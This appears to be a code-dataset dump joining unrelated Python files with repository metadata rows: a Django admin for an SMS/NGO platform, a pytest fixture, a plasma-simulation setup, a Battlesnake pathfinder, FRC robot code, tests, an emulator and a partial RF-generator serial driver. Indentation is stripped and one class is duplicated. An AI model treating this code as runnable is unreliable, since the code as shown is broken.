total_outgoing_messages.short_description = mark_safe('Outgoing Charged SMS:<br/>Total')
def total_messages(self, obj):
return obj.total_messages()
total_messages.short_description = mark_safe('Total SMS<br/>(incoming<br/>and<br/>outgoing)')
def combined_total_messages(self, obj):
return obj.combined_total_messages()
combined_total_messages.short_description = mark_safe('Total SMS<br/>(in total)')
def sms_submission(self, obj):
return obj.incoming_sms_count - obj.sms_registration_count
sms_submission.short_description = mark_safe('SMS<br/>Submissions')
def export_message_tracker_details_to_excel(modeladmin, request, query_set):
headers = ["Organization Name", "Organization Id","Type", "Month", "Total Incoming Submissions (In total)", "Total Incoming Submissions",
"Total SMS (incoming and outgoing)", "Outgoing Charged SMS: Total", "Outgoing SMS: Auto Reply", "Outgoing Charged SMS: Auto Reply",
"Outgoing SMS: Reminders", "Outgoing Charged SMS: Reminders", "Outgoing SMS: Send Message", "Outgoing Charged SMS: Send Message",
"Outgoing SMS: API", "Outgoing Charged SMS: API", "SMS Submissions", "SP Submissions", "Web Submissions", "SMS Subject Registration"]
list = []
textSearchFilter = get_text_search_filter(request.GET,MessageTrackerAdmin.search_fields)
adminPanelFilter = get_admin_panel_filter(request.GET)
filteredSms = MessageTracker.objects.all().filter(Q(**adminPanelFilter) & (textSearchFilter))
for messageTracker in filteredSms:
sms_tracker_month = ExcelDate(datetime.datetime.combine(messageTracker.month, datetime.datetime.min.time()),
'dd.mm.yyyy') if messageTracker.month else None
list.append([modeladmin.organization_name(messageTracker), modeladmin.organization_id(messageTracker),
modeladmin.type(messageTracker),
sms_tracker_month, messageTracker.total_incoming_in_total(),
messageTracker.total_monthly_incoming_messages(),
messageTracker.total_messages(), messageTracker.outgoing_message_count(),
messageTracker.outgoing_sms_count, messageTracker.outgoing_sms_charged_count,
messageTracker.sent_reminders_count, messageTracker.sent_reminders_charged_count,
messageTracker.send_message_count,
messageTracker.send_message_charged_count, messageTracker.sms_api_usage_count,
messageTracker.sms_api_usage_charged_count,
modeladmin.sms_submission(messageTracker), messageTracker.incoming_sp_count,
messageTracker.incoming_web_count, messageTracker.sms_registration_count])
response = create_excel_response(headers, list, 'tracker_list')
return response
actions = [export_message_tracker_details_to_excel]
class OrganizationChangeList(ChangeList):
def get_query_set(self):
if not self.params.get("q", ""):
return super(OrganizationChangeList, self).get_query_set()
from django.db import connection
cursor = connection.cursor()
query = """Select array_agg(DISTINCT o.org_id) from accountmanagement_organization o
inner join accountmanagement_ngouserprofile p on p.org_id = o.org_id
inner join auth_user u on u.id = p.user_id inner join auth_user_groups ug on ug.user_id = u.id
inner join auth_group g on ug.group_id = g.id and g.name = %s """
params = ["NGO Admins"]
for index, keyword in enumerate(self.params.get("q").split()):
from django_countries.countries import COUNTRIES
codes = ["'" + code + "'" for code, name in COUNTRIES if unicode(name).lower().find(keyword.lower()) != -1 ]
country_codes = ', '.join(codes) if len(codes) else "''"
query += "and " if index else "where"
query += " (o.country in (%s) " % country_codes
query += """OR u.email ilike %s OR u.first_name||u.last_name ilike %s OR o.name ilike %s
OR p.mobile_phone ilike %s OR o.address||o.addressline2||o.city||o.zipcode||o.state ilike %s
OR o.office_phone ilike %s OR o.website ilike %s OR o.org_id ilike %s
OR to_char(o.active_date, 'YYYY-MM-DD HH:MI:SS') ilike %s) """
params.extend(["%" + keyword + "%"] * 9)
cursor.execute(query, params)
org_ids = cursor.fetchone()[0]
qs = Organization.objects.filter(org_id__in=org_ids or [])
if self.order_field:
qs = qs.order_by('%s%s' % ((self.order_type == 'desc' and '-' or ''), self.order_field))
else:
qs = qs.order_by('-active_date')
return qs
class OrganizationChangeList(ChangeList):
def get_query_set(self):
if not self.params.get("q", ""):
return super(OrganizationChangeList, self).get_query_set()
from django.db import connection
cursor = connection.cursor()
query = """Select array_agg(DISTINCT o.org_id) from accountmanagement_organization o
inner join accountmanagement_ngouserprofile p on p.org_id = o.org_id
inner join auth_user u on u.id = p.user_id inner join auth_user_groups ug on ug.user_id = u.id
inner join auth_group g on ug.group_id = g.id and g.name = %s """
params = ["NGO Admins"]
for index, keyword in enumerate(self.params.get("q").split()):
from django_countries.countries import COUNTRIES
codes = ["'" + code + "'" for code, name in COUNTRIES if unicode(name).lower().find(keyword.lower()) != -1 ]
country_codes = ', '.join(codes) if len(codes) else "''"
query += "and " if index else "where"
query += " (o.country in (%s) " % country_codes
query += """OR u.email ilike %s OR u.first_name||u.last_name ilike %s OR o.name ilike %s
OR p.mobile_phone ilike %s OR o.address||o.addressline2||o.city||o.zipcode||o.state ilike %s
OR o.office_phone ilike %s OR o.website ilike %s OR o.org_id ilike %s
OR to_char(o.active_date, 'YYYY-MM-DD HH:MI:SS') ilike %s) """
params.extend(["%" + keyword + "%"] * 9)
cursor.execute(query, params)
org_ids = cursor.fetchone()[0]
qs = Organization.objects.filter(org_id__in=org_ids or [])
if self.order_field:
qs = qs.order_by('%s%s' % ((self.order_type == 'desc' and '-' or ''), self.order_field))
else:
qs = qs.order_by('-active_date')
return qs
class OrganizationAdmin(DatawinnerAdmin):
list_display = (
'name', 'org_id', 'complete_address', 'office_phone', 'website', 'paid', 'active_date', 'admin_name',
'admin_email', 'admin_mobile_number', 'sms_api_users', 'status')
actions = ['deactivate_organizations', 'activate_organizations', 'delete_organizations']
search_fields = ['name', 'address', 'addressline2', 'city', 'zipcode', 'state', 'office_phone', 'website']
ordering = ('-active_date',)
def get_changelist(self, request, **kwargs):
return OrganizationChangeList
def get_query_set(self, request, queryset, search_term):
queryset, use_distinct = super(OrganizationAdmin, self).get_search_results(request, queryset, search_term)
if search_term:
queryset = queryset.filter(ngouserprofile__title__icontains=search_term)
return queryset, use_distinct
def deactivate_organizations(modeladmin, request, queryset):
queryset.exclude(status__in=['Deactivated','Pending Activation']).update(status='Deactivated',
status_changed_datetime=datetime.datetime.now())
messages.success(request, _('The accounts selected have been deactivated successfully.'))
selected = request.POST.getlist(admin.ACTION_CHECKBOX_NAME)
orgs_id = Organization.objects.filter(org_id__in=selected).exclude(status='Pending Activation').\
values_list('org_id', flat=True)
User.objects.filter(ngouserprofile__org_id__in=orgs_id).update(is_active=False)
deactivate_organizations.short_description = "Deactivate accounts"
def activate_organizations(modeladmin, request, queryset):
queryset.exclude(status__in=['Activated','Pending Activation']).update(status='Activated', status_changed_datetime=datetime.datetime.now())
messages.success(request, _('The accounts selected have been activated successfully.'))
selected = request.POST.getlist(admin.ACTION_CHECKBOX_NAME)
orgs_id = Organization.objects.filter(org_id__in=selected).exclude(status='Pending Activation').\
values_list('org_id', flat=True)
User.objects.filter(ngouserprofile__org_id__in=orgs_id).update(is_active=True)
activate_organizations.short_description = "Activate accounts"
def delete_organizations(modeladmin, request, queryset):
orgs = queryset.filter(status__in=['Deactivated', "Pending Activation"])
for organization in orgs:
dbm = get_database_manager_for_org(organization)
organization.purge_all_data()
del dbm.server[dbm.database_name]
feed_database_name = "feed_" + dbm.database_name
feed_dbm = feeds_db_for(feed_database_name)
del feed_dbm.server[feed_database_name]
es = get_elasticsearch_handle()
try:
es.delete_index(dbm.database_name)
except Exception as e:
logging.info("Could not delete index " + str(e.message))
delete_organizations.short_description = "Delete accounts"
class Media:
css = {"all": ("/media/css/plugins/jqueryUI/jquery-ui-1.8.13.custom.css",)}
js = ("/media/javascript/jquery.js", "/media/javascript/jqueryUI/jquery-ui-1.8.13.custom.min.js",)
def sms_api_users(self, organization):
user_profiles = NGOUserProfile.objects.filter(org_id=organization.org_id)
return " , ".join([x.user.username for x in user_profiles if x.user.groups.filter(name="SMS API Users")])
def paid(self, obj):
return "No" if obj.in_trial_mode else "Yes"
def _get_ngo_admin(self, organization):
user_profiles = NGOUserProfile.objects.filter(org_id=organization.org_id)
admin_users = [x.user for x in user_profiles if x.user.groups.filter(name="NGO Admins")]
#right now there is only one ngo admin
return admin_users[0] if is_not_empty(admin_users) else NullAdmin()
def admin_email(self, obj):
return self._get_ngo_admin(obj).email
def admin_office_phone(self, obj):
admin_user = self._get_ngo_admin(obj)
return admin_user.get_profile().office_phone
def admin_mobile_number(self, obj):
admin_user = self._get_ngo_admin(obj)
return admin_user.get_profile().mobile_phone
def admin_name(self, obj):
admin_user = self._get_ngo_admin(obj)
return admin_user.first_name
def complete_address(self, obj):
complete_address = [obj.address, obj.addressline2, obj.city, obj.zipcode, obj.state, obj.country_name()]
return ", ".join([element for element in complete_address if is_not_empty(element)])
def get_readonly_fields(self, request, obj=None):
if obj:
return self.readonly_fields + ('status',)
return self.readonly_fields
class NullAdmin:
def __init__(self):
self.email = ''
self.mobile_phone = ''
self.office_phone = ''
self.first_name = ''
def get_profile(self):
return self
class CountryAdmin(admin.ModelAdmin):
ordering = ('country_name_en',)
list_display = ('country_name_en', 'country_code')
class NetworkAdmin(admin.ModelAdmin):
ordering = ('network_name',)
list_display = ('network_name', 'trial_sms_number', 'country_name')
filter_horizontal = ['country']
def country_name(self, obj):
return ' ,'.join([country.country_name for country in obj.country.all()])
class UserAdminForm(forms.ModelForm):
class Meta:
model = User
def clean(self):
cleaned_data = self.cleaned_data
if 'email' in cleaned_data:
username = cleaned_data.get('email').strip()
if not len(username):
raise forms.ValidationError("This email address is required")
existing_users_with_username = User.objects.filter(username=username)
if existing_users_with_username.count() > 0 and existing_users_with_username[0] != self.instance:
raise forms.ValidationError(
"This email address is already in use. Please supply a different email address")
cleaned_data['email'] = username
return cleaned_data
class NgoUserAdmin(DatawinnerAdmin):
list_display = ('organization_name', 'country', 'organization_id', 'admin_name', 'admin_email')
fields = ('email', )
form = UserAdminForm
def organization_name(self, obj):
profile = obj.get_profile()
return Organization.objects.get(org_id=profile.org_id).name
def country(self, obj):
return (Organization.objects.get(org_id=obj.get_profile().org_id)).country_name()
def organization_id(self, obj):
return obj.get_profile().org_id
def admin_name(self, obj):
return obj.first_name
def admin_email(self, obj):
return obj.email
def queryset(self, request):
qs = super(NgoUserAdmin, self).queryset(request)
return qs.filter(groups=Group.objects.filter(name="NGO Admins"))
def save_model(self, request, obj, form, change):
username = form.cleaned_data['email']
obj.username = username
obj.email = username
obj.save()
class DWUserChangeForm(UserChangeForm):
organization_id = CharField(label="Organization ID")
def __init__(self, *args, **kwargs):
super(DWUserChangeForm, self).__init__(*args, **kwargs)
self.fields['organization_id'] = CharField(label="Organization ID")
if self.instance:
self.organization_id_field()
self.fields['password'].widget.attrs['readonly'] = 'readonly'
self.fields['first_name'].label = "Name"
class Meta:
model = User
def organization_id_field(self):
org_id = ''
try:
user_profile = NGOUserProfile.objects.get(user=self.instance)
org_id = user_profile.org_id
except:
pass
self.fields['organization_id'] = CharField(label="Organization ID", initial=org_id)
def clean_organization_id(self):
org_id = self.cleaned_data.get('organization_id', '')
try:
org = Organization.objects.get(org_id__iexact=org_id)
return org.org_id
except Organization.DoesNotExist:
raise ValidationError('Organization with id : %s does not exist.Please enter a valid id' % org_id)
def _remove_default_name_fields():
user_display_fields = list(UserAdmin.list_display)
user_display_fields.remove('first_name')
user_display_fields.remove('last_name')
return tuple(user_display_fields)
def export_user_list_to_excel(a,b,c):
#Custom Method to export user details.
def is_required(user):
return True if user.groups.filter(name="NGO Admins").count() or user.groups.filter(name="Project Managers").count() else False
def user_role(user):
if user.groups.filter(name='NGO Admins').count():
return 'Admin'
elif user.groups.filter(name='Project Managers').count():
return 'User'
list = []
for ngo_user in NGOUserProfile.objects.all():
try:
user = User.objects.get(id=ngo_user.user_id)
if is_required(user) and not user.is_superuser:
details = []
details.append(user.first_name + ' ' + user.last_name)
details.append(user.username)
org_id = ngo_user.org_id
organization = Organization.objects.get(org_id = org_id)
details.append(organization.name)
details.append(organization.status)
details.append(organization.language)
details.append(user_role(user))
list.append(details)
except Exception:
continue
headers = ['Name', 'email', 'Organization Name', 'Status', 'Account language','User Role']
response = create_excel_response(headers,list,'user_list')
return response
class DWUserAdmin(UserAdmin):
list_filter = ('groups__name',)
UserAdmin.fieldsets = (
(None, {'fields': ('username', 'password')}),
(_('Personal info'), {'fields': ('first_name', 'email')}),
(_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser')}),
(_('Important dates'), {'fields': ('last_login', 'date_joined')}),
(_('Membership'), {'fields': ('groups', 'organization_id')}),
)
readonly_fields = ('last_login', 'date_joined')
list_display = _remove_default_name_fields() + ('name','organization_name', 'organization_id')
form = DWUserChangeForm
actions = [export_user_list_to_excel]
def name(self,obj):
return obj.first_name
def organization_name(self, obj):
org_id = NGOUserProfile.objects.get(user=obj).org_id
return Organization.objects.get(org_id=org_id).name
def organization_id(self, obj):
return NGOUserProfile.objects.get(user=obj).org_id
def save_model(self, request, obj, form, change):
super(DWUserAdmin, self).save_model(request, obj, form, change)
if change:
if 'email' in form.changed_data or 'username' in form.changed_data:
try:
existing_digests = PartialDigest.objects.filter(user=obj)
if existing_digests:
for existing_digest in existing_digests:
existing_digest.delete()
except PartialDigest.DoesNotExist:
pass
if form.cleaned_data.get('organization_id') is not None:
try:
user_profile = NGOUserProfile.objects.get(user=obj)
user_profile.org_id = form.cleaned_data['organization_id']
user_profile.save()
except NGOUserProfile.DoesNotExist:
user_profile = NGOUserProfile()
user_profile.org_id = form.cleaned_data['organization_id']
user_profile.title = 'Title'
user_profile.user = obj
user_profile.save()
admin.site.unregister(Group)
admin.site.unregister(User)
admin.site.register(OrganizationSetting, OrganizationSettingAdmin)
admin.site.register(OutgoingNumberSetting, admin.ModelAdmin)
admin.site.register(SMSC, admin.ModelAdmin)
admin.site.register(MessageTracker, MessageTrackerAdmin)
admin.site.register(Organization, OrganizationAdmin)
admin.site.register(Country, CountryAdmin)
admin.site.register(Network, NetworkAdmin)
admin.site.register(User, DWUserAdmin)
| 44.194595 | 218 | 0.677471 | 21,064 | 0.858774 | 0 | 0 | 0 | 0 | 0 | 0 | 5,384 | 0.219504 |
cddabebcaa2a91087a2f9f94dcd4f545a6f38cff | 283 | py | Python | tests/conftest.py | bayashi-cl/expander | b3623b656a71801233797e05781295a6101fefd8 | [
"CC0-1.0"
]
| null | null | null | tests/conftest.py | bayashi-cl/expander | b3623b656a71801233797e05781295a6101fefd8 | [
"CC0-1.0"
]
| 1 | 2022-03-12T20:41:21.000Z | 2022-03-13T06:34:30.000Z | tests/conftest.py | bayashi-cl/expander | b3623b656a71801233797e05781295a6101fefd8 | [
"CC0-1.0"
]
| null | null | null | import pytest
from unittest import mock
import os
import pathlib
@pytest.fixture(scope="session", autouse=True)
def set_pythonpath():
testlib_path = pathlib.Path.cwd() / "tests" / "testlib"
with mock.patch.dict(os.environ, {"PYTHONPATH": str(testlib_path)}):
yield
| 23.583333 | 72 | 0.713781 | 0 | 0 | 168 | 0.59364 | 215 | 0.759717 | 0 | 0 | 37 | 0.130742 |
cddacc9ad1d4172e5208503da82fc4edfb83363e | 1,870 | py | Python | init/global_eq_FCtest/setup_fns.py | mattzett/GEMINI-examples | 9932cee67e88898bd00c34bab7ac0568e92e40ca | [
"Apache-2.0"
]
| 1 | 2020-03-20T22:19:05.000Z | 2020-03-20T22:19:05.000Z | init/global_eq_FCtest/setup_fns.py | mattzett/GEMINI-examples | 9932cee67e88898bd00c34bab7ac0568e92e40ca | [
"Apache-2.0"
]
| 3 | 2020-02-14T14:36:27.000Z | 2020-04-03T21:06:27.000Z | init/global_eq_FCtest/setup_fns.py | mattzett/GEMINI-examples | 9932cee67e88898bd00c34bab7ac0568e92e40ca | [
"Apache-2.0"
]
| null | null | null | # This is mostly a repeat of model.setup from the pygemini repository except for that it setups up a periodic
# grid for us in full-globe simulations.
from __future__ import annotations
import argparse
from pathlib import Path
import typing as T
import shutil
import os
from gemini3d.config import read_nml
import gemini3d.model
def model_setup(path: Path | dict[str, T.Any], out_dir: Path, gemini_root: Path = None):
"""
top-level function to create a new simulation FROM A FILE config.nml
Parameters
----------
path: pathlib.Path
path (directory or full path) to config.nml
out_dir: pathlib.Path
directory to write simulation artifacts to
"""
# %% read config.nml
if isinstance(path, dict):
cfg = path
elif isinstance(path, (str, Path)):
cfg = read_nml(path)
else:
raise TypeError("expected Path to config.nml or dict with parameters")
if not cfg:
raise FileNotFoundError(f"no configuration found for {out_dir}")
cfg["dphi"]=90.0
cfg["out_dir"] = Path(out_dir).expanduser().resolve()
if gemini_root:
cfg["gemini_root"] = Path(gemini_root).expanduser().resolve(strict=True)
for k in {"indat_size", "indat_grid", "indat_file"}:
cfg[k] = cfg["out_dir"] / cfg[k]
# FIXME: should use is_absolute() ?
for k in {"eq_dir", "eq_archive", "E0dir", "precdir"}:
if cfg.get(k):
cfg[k] = (cfg["out_dir"] / cfg[k]).resolve()
# %% copy input config.nml to output dir
input_dir = cfg["out_dir"] / "inputs"
input_dir.mkdir(parents=True, exist_ok=True)
shutil.copy2(cfg["nml"], input_dir)
os.environ["GEMINI_ROOT"]="~/libs/bin/"
# %% is this equilibrium or interpolated simulation
if "eq_dir" in cfg:
gemini3d.model.interp(cfg)
else:
gemini3d.model.equilibrium(cfg)
| 29.68254 | 109 | 0.652941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 833 | 0.445455 |
cddc0485c396754b68315d1f0f82db760ff25dc5 | 2,580 | py | Python | floodfill_pathfinding.py | mnursey/Battlesnake-2021 | 884b9cf1b40c9b03cc49bd1594135e7caf41ee82 | [
"MIT"
]
| null | null | null | floodfill_pathfinding.py | mnursey/Battlesnake-2021 | 884b9cf1b40c9b03cc49bd1594135e7caf41ee82 | [
"MIT"
]
| null | null | null | floodfill_pathfinding.py | mnursey/Battlesnake-2021 | 884b9cf1b40c9b03cc49bd1594135e7caf41ee82 | [
"MIT"
]
| null | null | null | import board
class Floodfill:
frontier = []
grid = None
board = None
def __init__(self, game_board, start_cord):
self.board = game_board
self.grid = [[None for i in range(self.board.width)] for j in range(self.board.width)]
start_node = self.create_node(start_cord["x"], start_cord["y"], False, None)
self.frontier_add(start_node)
self.grid[start_cord['x']][start_cord['y']] = start_node
self.solve()
return
def solve(self):
while len(self.frontier) > 0:
current = self.frontier_pop()
if not current["blocked"]:
for n in self.board.neighbours(current["x"], current["y"]):
# Add to frontier if we haven't seen it
if self.grid[n['x']][n['y']] == None:
unseen_node = self.create_node(n['x'], n['y'], self.board.isBlocked(n['x'], n['y']), current)
self.grid[n['x']][n['y']] = unseen_node
self.frontier_add(unseen_node)
return
def path(self, target_cord):
node = self.grid[target_cord['x']][target_cord['y']]
path = []
while node:
path.append({"x" : node["x"], "y" : node["y"]})
node = node["from"]
path.reverse()
return path
def frontier_add(self, node):
self.frontier.append(node)
return
def frontier_pop(self):
return self.frontier.pop(0)
def create_node(self, x, y, blocked, prev):
return {"x" : x, "y" : y, "blocked" : blocked, "from" : prev}
def print(self):
output = "Grid:\n"
for y in range(self.board.width):
line = "\n"
for x in range(self.board.width):
node = self.grid[x][self.board.width - y - 1]
value = "-"
if node:
if node["from"] == None:
value = "s"
elif node["blocked"]:
value = "x"
else:
if node["from"]["x"] < node["x"]:
value = "<"
if node["from"]["x"] > node["x"]:
value = ">"
if node["from"]["y"] < node["y"]:
value = "v"
if node["from"]["y"] > node["y"]:
value = "^"
line = line + value
output += line
print(output)
return
| 27.446809 | 117 | 0.445736 | 2,565 | 0.994186 | 0 | 0 | 0 | 0 | 0 | 0 | 232 | 0.089922 |
cddc0ce80665ce382edeabc67713697083130041 | 3,736 | py | Python | Gobot-Omni/robot.py | FRC1076/2019-Parade | 3824449ed10e33b401efb646fd2e6470c3941c8b | [
"MIT"
]
| null | null | null | Gobot-Omni/robot.py | FRC1076/2019-Parade | 3824449ed10e33b401efb646fd2e6470c3941c8b | [
"MIT"
]
| 2 | 2019-06-17T23:38:23.000Z | 2019-06-17T23:39:43.000Z | Gobot-Omni/robot.py | FRC1076/2019-Parade | 3824449ed10e33b401efb646fd2e6470c3941c8b | [
"MIT"
]
| null | null | null | import wpilib
import ctre
from wpilib.drive import DifferentialDrive
from wpilib.interfaces import GenericHID
#MOTOR PORTS
LEFT = 1
RIGHT = 3
CENTER1 = 2
CENTER2 = 4
#BALL MANIPULATOR
BALL_MANIP_ID = 5
GATHER_SPEED = 1.0
SPIT_SPEED = -1.0
STOP_SPEED = 0.0
LEFT_HAND = GenericHID.Hand.kLeft
RIGHT_HAND = GenericHID.Hand.kRight
class MyRobot(wpilib.TimedRobot):
def robotInit(self):
"""Robot initialization function"""
# object that handles basic drive operations
self.leftVictor = ctre.WPI_VictorSPX(LEFT)
self.rightVictor = ctre.WPI_VictorSPX(RIGHT)
self.centerVictor1 = ctre.WPI_VictorSPX(CENTER1)
self.centerVictor2 = ctre.WPI_VictorSPX(CENTER2)
self.left = wpilib.SpeedControllerGroup(self.leftVictor)
self.right = wpilib.SpeedControllerGroup(self.rightVictor)
self.center1 = wpilib.SpeedControllerGroup(self.centerVictor1)
self.center2 = wpilib.SpeedControllerGroup(self.centerVictor2)
self.myRobot = DifferentialDrive(self.left, self.right)
self.myRobot.setExpiration(0.1)
# joysticks 1 & 2 on the driver station
# self.leftStick = wpilib.Joystick(0)
# self.rightStick = wpilib.Joystick(1)
self.DEADZONE = 0.4
self.LEFT = GenericHID.Hand.kLeft
self.RIGHT = GenericHID.Hand.kRight
self.driver = wpilib.XboxController(0)
self.ballManipulator = BallManipulator(ctre.WPI_VictorSPX(BALL_MANIP_ID))
def autonomousInit(self):
self.myRobot.tankDrive(0.8, 0.8)
def autonomousPeriodic(self):
self.myRobot.tankDrive(1, 0.5)
def teleopInit(self):
"""Executed at the start of teleop mode"""
self.myRobot.setSafetyEnabled(True)
def setCenters(self, speed_value):
self.center1.set(-speed_value)
self.center2.set(speed_value)
def deadzone(self, val, deadzone):
if abs(val) < deadzone:
return 0
return val
def teleopPeriodic(self):
ballMotorSetPoint = 0
if self.driver.getBumper(self.LEFT):
ballMotorSetPoint = 1.0
elif self.driver.getBumper(self.RIGHT):
ballMotorSetPoint = -1.0
else:
ballMotorSetPoint = 0.0
self.ballManipulator.set(ballMotorSetPoint)
"""Runs the motors with tank steering"""
#right = self.driver.getY(self.RIGHT)
#left = self.driver.getY(self.LEFT)
#self.myRobot.tankDrive(right, left)
forward = -self.driver.getRawAxis(5)
rotation_value = rotation_value = self.driver.getX(LEFT_HAND)
forward = deadzone(forward, 0.2)
self.myRobot.arcadeDrive(forward, rotation_value)
center_speed = self.driver.getX(self.RIGHT)
self.setCenters(self.deadzone(center_speed, self.DEADZONE))
class BallManipulator:
"""
Manipulator wraps a motor controller that gathers and spits
out the cargo balls.
"""
def __init__(self, motor):
self.motor = motor
def gather(self, speed = GATHER_SPEED):
self.motor.set(speed)
def spit(self, speed = SPIT_SPEED):
self.motor.set(speed)
def stop(self):
self.motor.set(STOP_SPEED)
def set(self, setValue):
"""
Direct control to be used with a controller
that puts out f, 0, and -f for gather, stop,
and spit, respectively.
"""
self.motor.set(setValue)
def deadzone(val, deadzone):
if abs(val) < deadzone:
return 0
elif val < (0):
x = ((abs(val) - deadzone)/(1-deadzone))
return (-x)
else:
x = ((val - deadzone)/(1-deadzone))
return (x)
if __name__ == "__main__":
wpilib.run(MyRobot) | 27.470588 | 81 | 0.646413 | 3,115 | 0.833779 | 0 | 0 | 0 | 0 | 0 | 0 | 674 | 0.180407 |
cddcaaf10bf47f30133fae7ab0e9db139ac2e1cc | 1,789 | py | Python | src/tests/test_decorators.py | elifesciences/builder | 161829686f777f7ac7f97bd970395886ba5089c1 | [
"MIT"
]
| 11 | 2017-03-01T18:00:30.000Z | 2021-12-10T05:11:02.000Z | src/tests/test_decorators.py | elifesciences/builder | 161829686f777f7ac7f97bd970395886ba5089c1 | [
"MIT"
]
| 397 | 2016-07-08T14:39:46.000Z | 2022-03-30T12:45:09.000Z | src/tests/test_decorators.py | elifesciences/builder | 161829686f777f7ac7f97bd970395886ba5089c1 | [
"MIT"
]
| 14 | 2016-07-13T08:33:28.000Z | 2020-04-22T21:42:21.000Z | from . import base
from mock import patch
import decorators
class TestDecorators(base.BaseCase):
@patch('decorators.LOG.info')
def test_timeit_smoke_test(self, info):
@decorators.timeit
def some_task(param, **kwargs):
pass
some_task(42, option='value')
(args, _) = info.call_args
self.assertIsInstance(args[0], str)
self.assertEqual(args[1], 'some_task')
self.assertEqual(args[2], (42,))
self.assertEqual(args[3], {'option': 'value'})
self.assertIsInstance(args[4], float)
self.assertGreater(args[4], 0.0)
def test_deffile(self):
self.assertEqual('/tmp/template.json', decorators.deffile('template.json'))
def test_setdefault(self):
decorators.setdefault('.active-stack', 'lax--ci')
with open('/tmp/.active-stack') as f:
self.assertEqual(f.read(), 'lax--ci')
@patch('buildercore.core.active_stack_names', return_value=['dummy1--ci'])
@patch('utils.get_input', return_value='1')
def test_requires_aws_project_stack(self, get_input, active_stack_names):
@decorators.requires_aws_project_stack('dummy1')
def some_task(stackname):
self.assertEqual('dummy1--ci', stackname)
return 'result'
self.assertEqual(some_task('dummy1--ci'), 'result')
@patch('buildercore.core.active_stack_names', return_value=['dummy1--ci', 'dummy1--end2end'])
@patch('utils.get_input', return_value='2')
def test_requires_aws_stack(self, get_input, active_stack_names):
@decorators.requires_aws_stack
def some_task(stackname):
self.assertEqual('dummy1--end2end', stackname)
return 'result'
self.assertEqual(some_task('dummy1--end2end'), 'result')
| 38.06383 | 97 | 0.653438 | 1,727 | 0.965344 | 0 | 0 | 1,375 | 0.768586 | 0 | 0 | 395 | 0.220794 |
cddea9a721eee8e3cc13555afb08ee013159480b | 2,158 | py | Python | integration/emulator/device.py | cvlabmiet/master-programming-example | 8a4a231ba2b72a93ae14da2c04e17b2ae3fc6651 | [
"MIT"
]
| null | null | null | integration/emulator/device.py | cvlabmiet/master-programming-example | 8a4a231ba2b72a93ae14da2c04e17b2ae3fc6651 | [
"MIT"
]
| null | null | null | integration/emulator/device.py | cvlabmiet/master-programming-example | 8a4a231ba2b72a93ae14da2c04e17b2ae3fc6651 | [
"MIT"
]
| null | null | null | import re, operator, array
from collections import namedtuple
class Argument(object):
def __init__(self, viewtype, begin, end=None):
self.type = viewtype
self.begin = int(begin)
self.end = None
if end is not None:
self.end = int(end)
class Lram(bytearray):
pass
class Pram(Lram):
def __init__(self):
# grammar: [<output>]<operation>(<input0>[, <input1>, ...])
# <output>, <input0>, ... - <type>:<begin>[:<end>] (begin, end - bytes offsets)
# <type> - u8, i8, u16, i16, ...
# <operation> - add, sub, div, mod, mul, ...
# <begin>, <end> - int
# example: [s16:200:400]add(u8:0, u8:100)
self.instruction = re.compile(r'\[(?P<out>[^\]]+)\](?P<op>\w+)\((?P<in>[^\)]+)\)')
self.operation = dict(add=operator.add, mul=operator.mul, mod=operator.mod, sub=operator.sub, div=operator.truediv)
self.type = dict(i8='b', u8='B', i16='h', u16='H', i32='l', u32='L', f32='f')
def _parse_arguments(self, op, lram):
arguments = [Argument(*x.split(':')) for x in op.split(',')]
return [memoryview(lram)[x.begin:x.end].cast(self.type[x.type]) for x in arguments]
def _vectorize(self, op, output, inputs):
for x in zip(range(len(output)), *inputs):
output[x[0]] = op(*x[1:])
def run(self, lram):
operations = self.instruction.findall(str(self).replace(' ', ''))
for op in operations:
outputs = self._parse_arguments(op[0], lram)
inputs = self._parse_arguments(op[2], lram)
self._vectorize(self.operation[op[1]], outputs[0], inputs)
class Unit(object):
def __init__(self):
self.lram = Lram()
self.pram = Pram()
class Ctrl(list):
def __init__(self, units):
self.units = units
def wait(self):
if len(self) == 0:
return []
number = self.pop(0);
unit = self.units[number]
unit.pram.run(unit.lram)
return [number]
class Device(object):
def __init__(self, units):
self.units = [Unit() for _ in range(units)];
self.ctrl = Ctrl(self.units)
| 33.2 | 123 | 0.561631 | 2,084 | 0.965709 | 0 | 0 | 0 | 0 | 0 | 0 | 360 | 0.166821 |
cde0f842eb62a19de3f38d4d8d1f8ff65a2ce325 | 10,538 | py | Python | Ramsey_RF_generator.py | bopopescu/Lauecollect | 60ae2b05ea8596ba0decf426e37aeaca0bc8b6be | [
"MIT"
]
| null | null | null | Ramsey_RF_generator.py | bopopescu/Lauecollect | 60ae2b05ea8596ba0decf426e37aeaca0bc8b6be | [
"MIT"
]
| 1 | 2019-10-22T21:28:31.000Z | 2019-10-22T21:39:12.000Z | Ramsey_RF_generator.py | bopopescu/Lauecollect | 60ae2b05ea8596ba0decf426e37aeaca0bc8b6be | [
"MIT"
]
| 2 | 2019-06-06T15:06:46.000Z | 2020-07-20T02:03:22.000Z | """
Ramsay RSG1000B RF Signal Generator, controlled via RS-323 interface
See: Ramsay RSG1000B RF Signal Generator User Guide, p.10-11
Settings: 9600 baud, 8 bits, parity none, stop bits 1, flow control none
DB09 connector pin 2 = TxD, 3 = RxD, 5 = Ground
The controller accepts unterminate ASCII text commands and generates newline-
terminated ASCII text replies.
Commands:
{255 - Initiate communication by addressing device number 255 (default device
number). Reply "\r\n". (Before that command all command with be ignored.)
GO - Get " RF ON\r\n" or " RF OFF\r\n"
O - Toggle RF on/off, reply: " "
Cabling:
"Pico8" iMac -> Prolific USB-SErial 2303 cable -> DB--9 female gender changer ->
Ramsay RSG1000B RF Signal Generator, DB-9 male serial port
Authors: Friedrich Schotte
Date created: 2018-01-22
Date last modified: 2018-01-23
"""
from logging import error,warn,info,debug
__version__ = "1.0"
class RamseyRFDriver(object):
"""Ramsay RSG1000B RF Signal Generator"""
name = "Ramsey_RF"
timeout = 1.0
baudrate = 9600
id_query = "{255"
id_reply = "\r\n"
id_reply_length = 2
wait_time = 0 # bewteen commands
last_reply_time = 0.0
def id_reply_valid(self,reply):
valid = (reply == self.id_reply)
debug("Reply %r valid? %r" % (reply,valid))
return valid
# Make multithread safe
from thread import allocate_lock
__lock__ = allocate_lock()
port = None
@property
def port_name(self):
"""Serial port name"""
if self.port is None: value = ""
else: value = self.port.name
return value
COMM = port_name
@property
def connected(self): return self.port is not None
@property
def online(self):
if self.port is None: self.init_communications()
online = self.port is not None
if online: debug("Device online")
